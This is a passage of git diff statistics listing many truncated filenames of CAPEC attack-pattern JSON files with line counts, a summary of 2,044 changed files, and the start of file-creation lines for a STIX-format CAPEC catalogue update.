...-87adce17-6faa-4dd1-b494-2aad494d524d.json | 20 + ...-8888fb2f-589c-4fad-b1c4-a650025959fe.json | 20 + ...-88cab279-e362-42a3-b9a9-be4353aa826f.json | 20 + ...-88df8824-2a9a-484a-a923-ab701e094915.json | 20 + ...-896afb75-0f0d-4181-ae82-46c064633811.json | 20 + ...-89927e5a-277d-4f6a-b091-3d0bf0e6bfdd.json | 20 + ...-8a19cac6-1d9f-4cc4-8268-8b2724964e81.json | 20 + ...-8a25e165-d6c1-44a3-bfb4-6cb12ba12e27.json | 20 + ...-8a4b7fe3-ad82-4086-9b30-6e5efcadea92.json | 20 + ...-8c1b98ef-65ad-4323-9bc2-25ad78c7c7b5.json | 20 + ...-8c21c97b-4442-4427-91f7-ed7820bde031.json | 20 + ...-8c3415e0-7622-4e5d-b63e-c5543b698140.json | 20 + ...-8cd24df9-fbbc-45e6-9090-777c7bae0516.json | 20 + ...-8d474304-906e-403d-ae0f-ae6720b2d8bd.json | 20 + ...-8d51a424-be03-4360-86e5-8b52593e1b9d.json | 20 + ...-8deebf71-a2a6-4b9f-b4da-0234b9d83b46.json | 20 + ...-8e7b2d66-fa6a-4ae8-ad81-c11393d31472.json | 20 + ...-8e9e84d8-f20f-480e-b7ee-8adcb95f5b2c.json | 20 + ...-8f12378e-8d19-4157-b06e-8658c0fed625.json | 20 + ...-8f235db5-fa5f-4639-8f92-66ee13f93eca.json | 20 + ...-8f47f09d-2b56-4f15-b305-6b27f49fbc94.json | 20 + ...-8fcd0914-f3d0-4b0f-9b42-9159f24c842d.json | 20 + ...-8ffe3d92-6215-4893-93ed-a0b59d44c7ef.json | 20 + ...-90451497-c256-4016-b419-27ccb799bf61.json | 20 + ...-904606f7-adeb-4c0f-aabb-02122345431a.json | 20 + ...-90a04154-3ee7-48e9-a06c-f491ab3828e6.json | 20 + ...-90aa64d8-d944-465e-a4f2-e675c4db1e3d.json | 20 + ...-90d7b81d-d132-4a5f-b3d4-40f3cec2c222.json | 20 + ...-91018696-0020-40cb-8d37-c1b79a559ea3.json | 20 + ...-917ea1c5-68c8-4efa-b1aa-57e3b3347b22.json | 20 + ...-91c36161-4a18-4529-8808-c0c86bf202c1.json | 20 + ...-91f8ddb2-7263-40a3-8ec1-becbc72ff0ee.json | 20 + ...-926ec109-c4a7-4b3c-937f-9b24ebec9ed7.json | 20 + ...-927081e8-eca0-40a8-8c97-382dfcb06c30.json | 20 + ...-92c11af4-116d-4550-ba14-1b9ab2fd48a0.json | 20 + ...-92ef7475-3bec-49f5-945c-8fa2019350ef.json | 20 + ...-9304375a-3ec0-4ab2-9134-a129993052b6.json | 20 + ...-93532399-3fea-4db4-9111-c588139409ff.json | 20 + ...-93e11447-0480-49d7-aaad-956638fa7bf2.json | 20 + ...-93e582b6-8370-4188-bdcf-2158965b6ac7.json | 20 + ...-943fef2d-bf83-4cb0-b4cc-ac89d5c9b082.json | 20 + ...-94846665-2cb7-4efe-a38f-f8bdf646bb70.json | 20 + ...-94a20952-5cb4-48c2-bccc-ab2ec6376b59.json | 20 + ...-94ce1a99-d4d8-479e-bcb5-d153a4d61f79.json | 20 + ...-95146f5b-2bf7-47fb-a30c-9c8176408c91.json | 20 + ...-956c0201-08bf-474c-ab45-a211617432ba.json | 20 + ...-95cf9e22-8502-4284-8803-e6b51f5e3520.json | 20 + ...-967de655-db81-4012-959a-55f1a9673fc9.json | 20 + ...-97626d09-376c-4acf-b43a-64f496130d56.json | 20 + ...-978d5ab4-e6d1-42c0-9135-320cebd99221.json | 20 + ...-97f8c959-d8f0-4569-99bb-cd3016c7c5bc.json | 20 + ...-9816bf94-06d8-4eb0-9d7d-6bf0f30107e5.json | 20 + ...-982673e3-3d4c-4c23-850f-c844a41e83a0.json | 20 + ...-98898885-8ffc-419e-b0ce-9e8f33f19b3c.json | 20 + ...-98e0dbe6-a94a-4303-9459-def28183f15b.json | 20 + ...-98e84fa7-8d01-47f0-b042-01de86a716a5.json | 20 + ...-99ab01a2-3d66-43bc-8f26-933c354de81b.json | 20 + ...-9a8a083e-85bb-46b5-83ff-791e98fdd243.json | 20 + ...-9b001554-1162-4f14-acbc-ae6fabb9dee4.json | 20 + ...-9b13aeb5-0061-4faf-a904-f6284e70689e.json | 20 + ...-9b6f79fa-271d-4307-90be-f07986141adf.json | 20 + ...-9b804090-8565-4f9a-b785-46ad01aab0b6.json | 20 + ...-9b8604b5-deb3-48af-a72b-c84250ac0317.json | 20 + ...-9b940f35-fced-43d4-b905-57b91eb79f96.json | 20 + ...-9bd389e5-7353-481d-a15f-0dd86ff65e04.json | 20 + ...-9c42b260-3a66-4a10-a9f2-92c5bca59e58.json | 20 + ...-9c5f4f0c-c505-4073-9be5-4b61f35fe38e.json | 20 + ...-9cb2c5bf-0fb9-4ca7-b1b4-703d684cb8d7.json | 20 + ...-9dccfaf7-028b-4ade-a84e-fb04748d4e00.json | 20 + ...-9e2c3cb9-45cc-41c4-9a87-250c23bc1ba1.json | 20 + ...-9e5fb7cb-c6d3-46ad-bab1-db9db3c164dd.json | 20 + ...-9ea36268-c2cd-4bb6-9a13-9fd992be4272.json | 20 + ...-9efb57e9-10c7-45fb-b44c-fe96ed2fdbe3.json | 20 + ...-9f18e491-5633-4ed9-ac64-4c31bef0b762.json | 20 + ...-9fa5c9f5-e86e-4150-86a2-9e4681532661.json | 20 + ...-9fdf5739-9951-4e6d-a393-920bca359c7b.json | 20 + ...-a05b8a5c-7e75-4870-8aef-4e433c3e2a87.json | 20 + ...-a1307e4c-a783-4836-b078-188634674a29.json | 20 + ...-a1b0fa62-f694-453e-9183-9e0e3bd73735.json | 20 + ...-a1fd5ca5-0589-4c9d-8841-bf0640514b20.json | 20 + ...-a2bf74d1-dba2-4b85-b66c-c35fc90c1ee5.json | 20 + ...-a2e6af07-0ede-4f9b-a34b-e30833fd8b5e.json | 20 + ...-a368132d-2ecf-40b4-8ce3-5f5933f296fd.json | 20 + ...-a39c75cf-553e-4ede-a010-3ce094d2b7c2.json | 20 + ...-a406c81b-ff0d-43ee-8744-d73583ca0d57.json | 20 + ...-a40d425c-439a-4eb3-af1e-e29e9c8a0152.json | 20 + ...-a430a05b-fd21-408e-9e44-d91dbf00b0f9.json | 20 + ...-a443ace7-3d84-46bd-8fb0-ce9c208edef9.json | 20 + ...-a459d059-1af8-49fa-b08d-8a57a8d1be8c.json | 20 + ...-a4607e08-74ba-474f-84b1-b14053c9c7fa.json | 20 + ...-a4a643b5-7a39-4bf8-ab5c-d768adc88b0c.json | 20 + ...-a4ace4df-6367-4a85-b7a9-d39c0066ff3b.json | 20 + ...-a5cd32a1-ba17-4566-8c53-384cfcfd19bd.json | 20 + ...-a5feef4d-dd12-465c-a1f4-54a66811f051.json | 20 + ...-a62a21f8-c485-4c1e-9f87-9b46d915c0cd.json | 20 + ...-a650e22c-56f2-45a6-b7a0-902313c33b44.json | 20 + ...-a68920c3-bc51-419d-aeab-76c0de9d2e7a.json | 20 + ...-a68fcccc-ef4a-49a1-8f59-93d8dd7805f1.json | 20 + ...-a6a06b65-e7de-417e-bd2a-4f4956c21f02.json | 20 + ...-a7601573-6a34-404f-a4fa-bd61bafa7224.json | 20 + ...-a76c2831-eff2-476f-8559-da6ccb5ff01a.json | 20 + ...-a7bf4756-6477-4cdc-bbc6-bacb52b3df40.json | 20 + ...-a8321ce6-7aa9-4ff1-b278-0b9fbd962b91.json | 20 + ...-a84d6185-2db4-497a-9695-e47d54880e22.json | 20 + ...-a8538d8c-fff5-4de4-a592-413face454fa.json | 20 + ...-a8577b37-fca4-43f3-a947-a0e9a81ff263.json | 20 + ...-a8bb5bce-434d-461f-812c-eb23c148b075.json | 20 + ...-a99a314c-2ec0-4a3e-b1cc-c03761a4577a.json | 20 + ...-a9aeaf08-5aba-42dd-91d1-bcc39d45f830.json | 20 + ...-a9b907b4-52c2-42f8-a7ba-52b608c41cdc.json | 20 + ...-a9ddebe0-1aaa-4113-b4af-d3be1bb746d0.json | 20 + ...-a9ebb372-0dce-4558-9cb8-ea6454d9b79b.json | 20 + ...-aa7d6d83-e79a-4a8d-a59e-f3592ca65b89.json | 20 + ...-aa8b1d29-f699-40ae-ae85-528d22562479.json | 20 + ...-aacfa64c-2007-4b20-a791-3207866e0565.json | 20 + ...-ab4e9f7b-ce52-40e6-b090-746b9e36a5db.json | 20 + ...-abe12e18-a9a3-45fa-be8f-aa5caad45774.json | 20 + ...-abf2549f-6e96-4043-b6dc-f2ad2ba3ea61.json | 20 + ...-abfc9759-5f7a-4248-b276-110e96beb9d8.json | 20 + ...-ac2fc394-d6b0-4a44-b765-9fe73123b253.json | 20 + ...-ac38c85d-0695-4c49-8b5b-d3c521ec56dd.json | 20 + ...-ac4c7cbb-8bb1-4d48-bb09-24bd2867ec1c.json | 20 + ...-ac81cf41-7bdc-4415-a2af-288452a727be.json | 20 + ...-ad5a9c4f-dec3-41d6-b5af-dec89b0bf143.json | 20 + ...-ad9f9eb4-b077-4187-b75e-5561e357dc68.json | 20 + ...-adc43532-79b6-4deb-98eb-2200ee6be8e5.json | 20 + ...-adceacd0-9e5e-4879-9dfc-db9c1be833b9.json | 20 + ...-ae108410-45fa-495c-8900-bdbbfb9b1fc6.json | 20 + ...-aedc6d88-0ce3-4a62-a4c0-8f223d460a4c.json | 20 + ...-b0af97af-2ac2-4d5a-8fb1-3cfaeedc6ee2.json | 20 + ...-b0bb3dd2-e5e1-4b91-ace3-c6db22d9d1a2.json | 20 + ...-b12d3857-9aea-4d9b-b610-b8f2ab7a77ef.json | 20 + ...-b146ae5b-3105-49dd-946f-8ad19f54a35a.json | 20 + ...-b1906b70-d693-4d9b-bd12-ac22eb49e5fe.json | 20 + ...-b2123192-f6e4-4402-b8aa-3256e75fb07c.json | 20 + ...-b2f2e038-a80c-4cf3-b3b0-bfc4279080a0.json | 20 + ...-b32b8dd1-e256-46d1-843f-7a038a0c9afb.json | 20 + ...-b3400a5a-bf24-45d1-942d-423db78369c8.json | 20 + ...-b351048d-671f-4e59-8dfd-d6c494ec0a3d.json | 20 + ...-b3801462-8d46-4a12-8f43-022579f9a1d1.json | 20 + ...-b3e1c5c7-5f3b-41e2-9fe4-f5bea1789010.json | 20 + ...-b3f766e9-52da-4e96-b4e2-ceabba6c233c.json | 20 + ...-b4102a59-40e2-4b12-9a6c-f1f3747926e5.json | 20 + ...-b43a9a55-d2a6-43fb-a6a2-a6dd5eda77b5.json | 20 + ...-b4584b1d-d9de-42d3-85ee-c0cd0d5a2e0b.json | 20 + ...-b4b6093c-6dee-4797-a60d-79cda0f1293b.json | 20 + ...-b5155ed4-8f92-4832-b65a-80ac64463a0a.json | 20 + ...-b54d0e01-4c7b-4f6b-b3eb-570663235131.json | 20 + ...-b5a8d903-9fac-4d31-be99-93da4e1b8d06.json | 20 + ...-b6f089ae-d8b8-4e88-a730-5eff3b909673.json | 20 + ...-b714a160-45ab-42cc-8ed2-9e2f3b91b07b.json | 20 + ...-b790204c-09bb-42ab-af79-4dfe85f6a848.json | 20 + ...-b7a2284e-2098-4d9c-9fd2-051cb7581e03.json | 20 + ...-b7a582bf-6fc4-41b5-aa82-24a573fc080f.json | 20 + ...-b7ce42f6-518b-4c8e-8da7-ae32c04486c8.json | 20 + ...-b8735d4a-9ef5-4d8b-92ec-ee3b9b0f2cfc.json | 20 + ...-b8d0a57a-7ab7-4d6c-9f1b-77b16561a7db.json | 20 + ...-b8feb49d-0da7-4086-9ff4-922eda80d0d1.json | 20 + ...-b914cf9d-94aa-417c-88b4-819c3934159f.json | 20 + ...-b91617f1-b967-4057-9b2d-257754101ebf.json | 20 + ...-b94b8cfb-b5b8-4c4f-aaed-9a9e632ac4f7.json | 20 + ...-b97f03f1-ddab-49e7-81c2-c49afb2dde4e.json | 20 + ...-b98b347f-fe01-4005-96a1-407ba02335de.json | 20 + ...-ba665997-3d38-41e2-95e3-4426e254e080.json | 20 + ...-ba8d1163-39d3-4a85-907a-f806c1d6678a.json | 20 + ...-bae1d426-0299-4081-97f5-202119a241f0.json | 20 + ...-bc1c0d60-d9b5-4a17-84a5-e572772c76ea.json | 20 + ...-bce6dd14-bef7-481a-9104-ce0713480b0b.json | 20 + ...-bd42a550-a4da-4086-a5c8-c1e27cb48ac0.json | 20 + ...-bdbe3425-bc01-42c2-ae13-4307f4300cf8.json | 20 + ...-be3c1d6b-d331-4353-b22d-33fc18ee979a.json | 20 + ...-be3fde87-7de1-4c5d-a814-8e658302bc63.json | 20 + ...-be4ac31b-9a45-48cb-8545-c040b42c44c7.json | 20 + ...-bef63288-a9ec-46f1-9212-708d0ea32d22.json | 20 + ...-bf19970b-a040-4386-9015-519164a84e3e.json | 20 + ...-bf2dd714-1db9-4c9b-b2e7-4ef7380a4319.json | 20 + ...-bff251e7-c45a-4a47-84f1-4dc948e663a8.json | 20 + ...-bfffc983-2c3b-4fba-9fad-62fafafffdb1.json | 20 + ...-c00c72a0-8eb1-4b19-b7d1-858ec5b569d5.json | 20 + ...-c04c55ea-7aca-4a53-8dfa-41c78e806bbe.json | 20 + ...-c054bc28-f5d2-42a2-aa76-11e6f91a034b.json | 20 + ...-c095e46c-44ee-4328-9514-b82653c95e7d.json | 20 + ...-c0e2e578-a6d9-4ed6-a0b4-f8033d9e1cba.json | 20 + ...-c10a2663-afd1-4155-837d-0204962bc33b.json | 20 + ...-c227b815-920b-4f06-a992-da5735203e11.json | 20 + ...-c2ed3542-975b-48fd-b65c-cec9e9046ead.json | 20 + ...-c32edb27-a6bf-4699-a91b-d5af0ea4c945.json | 20 + ...-c337d703-18ca-4ed6-8c29-8ed9b62345c2.json | 20 + ...-c373a9df-c5ca-4de1-bc88-a2ba81ddcf65.json | 20 + ...-c3f43923-aaf4-49f3-9671-2870eb851f3b.json | 20 + ...-c4a3ee46-a116-4224-a073-e75de578148d.json | 20 + ...-c4b71657-f6fb-4546-983e-8fd276338402.json | 20 + ...-c4fe5624-8c5e-4141-9db5-09a251aca913.json | 20 + ...-c5326510-c7fc-46a8-8c26-23e60ac15beb.json | 20 + ...-c56ba4aa-f3c0-4445-b600-e4a5f3b357a2.json | 20 + ...-c59c0b88-2a22-4feb-9521-220cbbe8a0c8.json | 20 + ...-c65ca8fe-0c7a-4e94-ba95-6e00da5b6f10.json | 20 + ...-c66a4576-2d04-4099-8a5c-91a340688c10.json | 20 + ...-c6e696a4-de63-4daf-ace7-92adb1fcb939.json | 20 + ...-c6ec2d76-e409-4f47-b91d-f0c14c2f7e28.json | 20 + ...-c6eff99c-44a6-4a6b-a24c-ee37b75d0d50.json | 20 + ...-c729dc55-a1b8-443c-bbc9-d4404dadda06.json | 20 + ...-c72d1e60-6f64-45ad-9ac1-bf091aeb1325.json | 20 + ...-c7501a8c-7f42-4536-8b86-125603eaba9d.json | 20 + ...-c7b26389-c529-4d2b-ad7b-e74fc65699db.json | 20 + ...-c7bb5a65-1cfa-4368-99de-417b00375584.json | 20 + ...-c872df25-83b3-49d5-bfa5-f1d177eee584.json | 20 + ...-c87904c0-cfe0-43b2-8962-79660b813dbd.json | 20 + ...-c997e17d-b481-44ab-8641-d268fc9964bb.json | 20 + ...-ca2c3223-2a6d-4d2b-9ea0-2990f3112c58.json | 20 + ...-ca6ddc66-5dac-4b75-8d8d-e0e6afed9e7c.json | 20 + ...-caa76434-7cae-42ce-9634-01b8f7882546.json | 20 + ...-cb112114-48b9-48c9-ac6d-3a22374a55cc.json | 20 + ...-cb17feb8-6d17-4b8c-b451-c4c2747dfa9e.json | 20 + ...-cb2731ed-1fd9-400f-892f-9a3168c06b92.json | 20 + ...-cb8e0fa8-9821-4987-a59e-d3b9c6e3481b.json | 20 + ...-cbda8fea-6328-4a87-acd6-4f41441bade8.json | 20 + ...-cc1c02e5-b81a-4280-874b-987523b1eb0d.json | 20 + ...-cc6e015d-75ba-4437-992c-d391fd8fe429.json | 20 + ...-cc96eadf-14e2-405b-b2b7-6f4b9f6fab4a.json | 20 + ...-cca4c79f-b73e-4b99-a721-6dceff911aa1.json | 20 + ...-cccb0e32-4f31-47b9-97ac-316107163645.json | 20 + ...-ccf3323d-a371-4ec9-8947-290aa02ec914.json | 20 + ...-cd2b2d1e-29d4-4ec5-9876-b210fdfded05.json | 20 + ...-cd90abb4-18df-4f14-b008-5157c2b99f68.json | 20 + ...-ce46e0f7-73b1-4efc-88f4-9df919fc2aac.json | 20 + ...-ce8b0873-e9de-4fc3-9331-a5fc5bdf683e.json | 20 + ...-cf0f24ae-b5cd-4c07-bda1-953830cf32e1.json | 20 + ...-cf1c4ee3-f9f4-4ee0-9298-e76477625c86.json | 20 + ...-cf66450b-3ba3-4f36-a971-e70bd18b40d6.json | 20 + ...-cf721c34-2455-49c9-87ab-611748f9729e.json | 20 + ...-cfb3d24c-1063-4fb7-b92d-fdf4f9fe78c6.json | 20 + ...-cfc78176-c50f-4529-ada7-323f4e9cd8d7.json | 20 + ...-cfe0adac-6b73-4dfe-91b4-5d01f64c0cc9.json | 20 + ...-d077bf67-717c-431d-8807-92f3e2097865.json | 20 + ...-d0bc5860-9b04-48da-a5f7-565401e455d0.json | 20 + ...-d19620bf-46ac-4d64-ade7-b75e7eb319ee.json | 20 + ...-d1abf586-d257-4a72-b14d-44f92a3e45f5.json | 20 + ...-d20b7e36-5317-45bc-9e89-762bbfa2dd1e.json | 20 + ...-d2218e8a-5035-416c-9762-451d807827d9.json | 20 + ...-d29c49cc-16e8-4c17-a5c2-5e4415d7b815.json | 20 + ...-d2deab8f-48e8-4479-95ee-7dab64bf8abf.json | 20 + ...-d33fd327-13cb-4adc-b807-9ff679445dad.json | 20 + ...-d34e4a9a-884e-4ede-8bb0-ecb72878cd9e.json | 20 + ...-d391abd9-19e1-4e4a-a3c0-913173953fbc.json | 20 + ...-d42da37c-5f9f-4437-ba40-8053ede73471.json | 20 + ...-d530cdcd-aa63-45a6-9fae-a6fccd7611f5.json | 20 + ...-d531c3c1-1da2-4094-ac85-c1a898def7c4.json | 20 + ...-d5acf000-e927-4934-baeb-fc883db06de3.json | 20 + ...-d5b57f85-6077-4111-b65e-7cd4e05b7a3d.json | 20 + ...-d61b1986-cb61-404b-950f-99e02127487b.json | 20 + ...-d67f7aa5-b8c0-4d6b-a352-e2014c2ab4a4.json | 20 + ...-d69e0751-1feb-4f2b-9ade-3cbd0a54df58.json | 20 + ...-d6a3f662-340c-48f9-b5b2-a29dea44f063.json | 20 + ...-d6d51161-5f82-4300-b109-a5e2b2b14bb6.json | 20 + ...-d7270969-0769-46e7-8213-d5b854f35036.json | 20 + ...-d77dd200-9428-4542-ac9f-78ad58d97e44.json | 20 + ...-d822a68b-f0d2-4ae6-8b1c-74f0fed06822.json | 20 + ...-d85cb99b-75fc-40b8-b479-a285d0aeb85a.json | 20 + ...-d8998cbe-e124-485a-85ca-beca9108afce.json | 20 + ...-d8bf5219-94ef-4829-bdad-7e05f03ae829.json | 20 + ...-d8f13ddc-c02e-4681-b7ee-7cad74447e96.json | 20 + ...-d970ad7b-bf7a-494f-bb14-0ad408590f7f.json | 20 + ...-d976aa2c-3f03-4383-b45e-c998a45082ec.json | 20 + ...-d9848bd9-0bf1-4cd7-a54d-6705d22774da.json | 20 + ...-d9a8c5e3-2477-43de-8f04-8f41783b7b35.json | 20 + ...-d9d4d723-586f-4c3a-a8b7-ca4c09b95834.json | 20 + ...-da069bcf-e3fc-45a2-8488-8326ecf63287.json | 20 + ...-da3beacf-86f4-48b1-b708-6d616e14a15e.json | 20 + ...-daa0a22b-2612-43c3-b60b-8550dfbbda10.json | 20 + ...-dac60376-221f-4f8b-8e87-6a9be6bbdd6d.json | 20 + ...-db1f1278-148e-4811-b44c-d2691ae606e0.json | 20 + ...-db7e558e-5af8-43b1-b4d1-5ce7a528a034.json | 20 + ...-dbdf4dc2-e842-48b0-9d02-06a0117f2b15.json | 20 + ...-dc0386a5-c653-4bb9-8148-ba86b01e0a0f.json | 20 + ...-dc195719-aaad-4810-9bd1-851dcc2aeb85.json | 20 + ...-dc8b3664-52e4-4864-ab89-3926d27aa304.json | 20 + ...-dcbfdd7f-940c-418e-a258-2899bf5c0316.json | 20 + ...-dcd48fbc-b429-4c89-b428-733efabf98b6.json | 20 + ...-dcdd89b0-3356-4eb7-abf5-64902536faa4.json | 20 + ...-dd1d2c3e-fd13-49f7-b0a1-0883915a3c74.json | 20 + ...-dd73c22b-5b7a-49c7-b1c0-26ea1711f627.json | 20 + ...-dd9e8510-5611-4488-84bd-6bdc3ac13dfe.json | 20 + ...-dda274ba-4e45-4ee8-8d58-f4416669e11b.json | 20 + ...-dea5e196-bc7b-418c-b405-7f8b242151fc.json | 20 + ...-dec10c5f-f312-48a3-8d6a-48d5939b0f00.json | 20 + ...-def22fd5-a3d1-4331-ab3c-a8637e40edff.json | 20 + ...-df34685d-a932-4704-9995-216ff7affeab.json | 20 + ...-dfdc35bd-a773-482e-b52a-f7bb560b8f97.json | 20 + ...-e0c29fae-f715-4f15-9b29-78c6871a310b.json | 20 + ...-e12c9fb3-9901-43eb-8175-dac851b91921.json | 20 + ...-e17c61dc-f469-462d-9568-39ce472f17a4.json | 20 + ...-e18da919-cf74-4285-8858-382596037a0b.json | 20 + ...-e281db8d-4ac2-467b-a5f5-aae48f2fd6b8.json | 20 + ...-e2c89b6f-acd9-4d5d-8774-36cec7da6a5f.json | 20 + ...-e3437db4-9065-421c-9b17-0a4e607042a2.json | 20 + ...-e355a8ca-9f3a-48fa-8f9a-a92ed321ed1d.json | 20 + ...-e3b59227-9abe-4f53-929d-a30a0f1c33a1.json | 20 + ...-e4059f56-d33f-4125-a86c-21511b62d57a.json | 20 + ...-e46a2581-471f-4b3c-8faa-5bc70e339312.json | 20 + ...-e46dedda-2a12-4e24-a23c-ff80c6a382c3.json | 20 + ...-e48f7336-578e-443a-8eda-088c9b4ccb4d.json | 20 + ...-e53caf75-e408-4906-8048-06afdbab160f.json | 20 + ...-e54b555f-10e3-4a42-b769-0664f0a2ff3c.json | 20 + ...-e5f11d4b-2865-4d54-9f57-ad416f4ae3b3.json | 20 + ...-e6867382-02a5-45fe-aff0-11c524c9b7d3.json | 20 + ...-e6cf1bc0-0177-4b9d-b823-0a767fc6a2b3.json | 20 + ...-e7276d74-feac-40c8-8ef2-317d1eb3ac80.json | 20 + ...-e74697e0-2f05-4c6e-aee7-ce34e30ac2a0.json | 20 + ...-e9aa7abb-e935-4be6-8e9f-cd6c1f042120.json | 20 + ...-ea2abd6b-96e4-435c-a8dd-b19f7bce8721.json | 20 + ...-ea3cdbc2-1ee8-412f-8053-7535c1ee1e7b.json | 20 + ...-ea719cfb-76a9-4d7d-9224-274811c7d7ac.json | 20 + ...-ea844e99-746b-4c68-91c3-e9b33a0de653.json | 20 + ...-eaca4f22-bac1-4cc3-8e40-2ee1dd484078.json | 20 + ...-eae7fdc2-a9a8-4d5e-9a24-769a58a5cdc0.json | 20 + ...-eb359e19-953c-4676-b70c-7988d4e41952.json | 20 + ...-eb3a7a0f-6512-45a1-a711-855fa3d9856c.json | 20 + ...-eba54b7c-685e-4917-a4d8-2ad388f9d918.json | 20 + ...-ebb70aa9-33c4-45e4-9139-554675520760.json | 20 + ...-ec559739-62b4-400d-b852-db5c7a71f248.json | 20 + ...-ec9fd5bc-7801-4acd-bcd5-18947ec8d217.json | 20 + ...-eca6e1f0-5c98-4ae9-8052-e029952bbe26.json | 20 + ...-ecc3568c-6e06-473e-b126-2c18dec93b5d.json | 20 + ...-ed190e5e-e0e7-458b-8f5b-c30d9de7993a.json | 20 + ...-ed20bf5f-6738-4a0d-be2a-9a43fc2b397c.json | 20 + ...-ed61e4e1-5489-4563-9d23-1866ea877661.json | 20 + ...-edd38d2f-4f92-4c3a-9d39-82a5810b2cd5.json | 20 + ...-ede2474f-657d-48e4-a372-3ac38faf2123.json | 20 + ...-ee78fdd8-4fe3-4b08-8cca-cbccb81b05cf.json | 20 + ...-ef120778-1411-4dba-ae54-ead16af74f16.json | 20 + ...-ef36ffdd-7029-4bef-93d9-67a65dd90444.json | 20 + ...-efacb91b-c8b4-4a7d-b2b4-b9f74851d2ba.json | 20 + ...-efe380b7-2bc1-4a1a-8bbd-cf79afddb8e8.json | 20 + ...-f01e1863-7f77-4d86-a3dd-42542b82e1f8.json | 20 + ...-f044155f-cc90-402f-8a90-33dfa66446c3.json | 20 + ...-f0562beb-5a29-416e-bdec-f1c183db6237.json | 20 + ...-f17d2dbc-4dda-4687-82f4-b1365fd82e11.json | 20 + ...-f18a5424-9f62-4d5d-96d0-a4fe39121c41.json | 20 + ...-f1b706da-f3ca-46f8-ba74-f37311cd7149.json | 20 + ...-f2468477-632c-4a1b-be8c-e9ff89965aff.json | 20 + ...-f28ab700-0168-496d-9772-5d1cad1532b7.json | 20 + ...-f2bbfee3-f2c6-498e-a90f-ab054df7d912.json | 20 + ...-f33b663c-4618-4a6a-9407-e3a6753e3ce5.json | 20 + ...-f350a84b-fb24-4e17-860a-7a8661a662a0.json | 20 + ...-f3536738-ef95-497f-9419-9e845e1a4fe3.json | 20 + ...-f3d0e095-dd5e-4765-ae7e-755163a4687a.json | 20 + ...-f42cc4b9-2a4a-4f0e-90f9-b6004443f1d0.json | 20 + ...-f47e6dc7-0c11-4423-8905-ce9233c8aa56.json | 20 + ...-f4dde5ab-520a-4b4e-a483-a8f50e447dbf.json | 20 + ...-f4f5521b-dcf2-48f8-8087-5626b06446ca.json | 20 + ...-f51e8b12-d41f-489c-a654-8867e6f3e015.json | 20 + ...-f578d9fb-fe71-48f7-8fbb-d45167ed1846.json | 20 + ...-f5987f26-b520-4611-9955-47308a4ab228.json | 20 + ...-f5a9f1e7-823a-4866-b736-cb4ae25c5ec8.json | 20 + ...-f5b48029-c434-4493-8aed-e71719117926.json | 20 + ...-f5c0ea9b-986b-4c21-8bad-07b3b2877a81.json | 20 + ...-f730b1cf-6be9-4267-83a3-bafb3298183d.json | 20 + ...-f7328c84-cf21-40c0-9a07-aa393b67ce63.json | 20 + ...-f85f68b6-6f23-4af9-83cd-87d22db28551.json | 20 + ...-f8ea324e-3205-4840-9f4d-882dd1653a69.json | 20 + ...-f8fcdbfa-108d-4232-b020-a5c907dc809b.json | 20 + ...-f9e4c464-be58-41c0-9a77-ccfdc854a000.json | 20 + ...-fa4ed481-62ad-4d79-a2fc-64104574eeff.json | 20 + ...-fad1edac-f0a5-48d7-b651-4d1eb2869a8c.json | 20 + ...-fafda083-84e0-40e7-8e6d-dd060d98f9a0.json | 20 + ...-fb58982e-6527-4113-bd7c-61aa753ad5b1.json | 20 + ...-fb7a7520-3f18-4bee-b0cd-8e8bd6589311.json | 20 + ...-fc5ddb13-a8bc-48f6-9bf0-d88a106a5170.json | 20 + ...-fc7c7cca-edd7-4b8f-9557-499a5368bd78.json | 20 + ...-fcc957ee-8c3a-4698-b94d-30863757d021.json | 20 + ...-fd5b21d9-bbc6-4c2d-bcc2-1d828f360a86.json | 20 + ...-fdb93c2f-f884-40a4-89c2-5cf4510641f0.json | 20 + ...-fea61934-d6b2-4519-87c4-ec48ad2536e2.json | 20 + ...-feb130f4-7a68-43cd-9a77-10d60e95475f.json | 20 + ...-fec84e5e-c761-451c-8652-d4fd2a29e922.json | 20 + ...-fed76d01-7c49-48d9-8fa0-6fbdcd09ac9b.json | 20 + ...-feecba9f-ded0-410b-9f23-51c5b3b5dcae.json | 20 + ...-ff9f1927-dbeb-401a-8f36-cfeebad3521d.json | 20 + ...-ffdbbef1-9cc0-4d00-8cdb-0e437e9e149e.json | 20 + ...-ffe18c13-75af-4579-9329-168b3296cf71.json | 20 + capec/stix-capec.json | 17139 ++++++++-------- 2044 files changed, 70319 insertions(+), 8202 deletions(-) create mode 100644 capec/attack-pattern/attack-pattern--0278e44f-8fb4-4c02-bde1-0ccbe12a1b15.json create mode 100644 capec/attack-pattern/attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a.json create mode 100644 capec/attack-pattern/attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc.json create mode 100644 capec/attack-pattern/attack-pattern--02f28ad7-180e-4f98-9716-1ae8851748da.json create mode 100644 capec/attack-pattern/attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a.json create mode 100644 capec/attack-pattern/attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70.json create mode 100644 capec/attack-pattern/attack-pattern--0500cb36-fc64-4b99-be3d-156b7867d014.json create mode 100644 capec/attack-pattern/attack-pattern--058622b3-81cb-403b-9169-404832c7afaf.json create mode 100644 capec/attack-pattern/attack-pattern--064c9dd0-8008-4ca9-bde6-63feef10d053.json create mode 100644 capec/attack-pattern/attack-pattern--06e600b5-fc35-41e3-8f11-cfe801d0e623.json create mode 100644 capec/attack-pattern/attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71.json create mode 100644 capec/attack-pattern/attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e.json create mode 100644 capec/attack-pattern/attack-pattern--08fc69ee-ec0f-466e-b81f-3e4ad15f957b.json create mode 100644 capec/attack-pattern/attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9.json create mode 100644 capec/attack-pattern/attack-pattern--0a4e2ddd-8014-4979-8ddf-42cafef2e657.json create mode 100644 capec/attack-pattern/attack-pattern--0a4e6d07-4253-4194-a606-477cb09a9f36.json create mode 100644 capec/attack-pattern/attack-pattern--0aef1f25-ea71-4790-95d5-32b8b16e7ca7.json create mode 100644 capec/attack-pattern/attack-pattern--0b3cd893-e335-4def-8662-9af40760517e.json create mode 100644 capec/attack-pattern/attack-pattern--0cfa0b69-241b-411b-bf20-d4a3b758a672.json create mode 100644 capec/attack-pattern/attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74.json create mode 100644 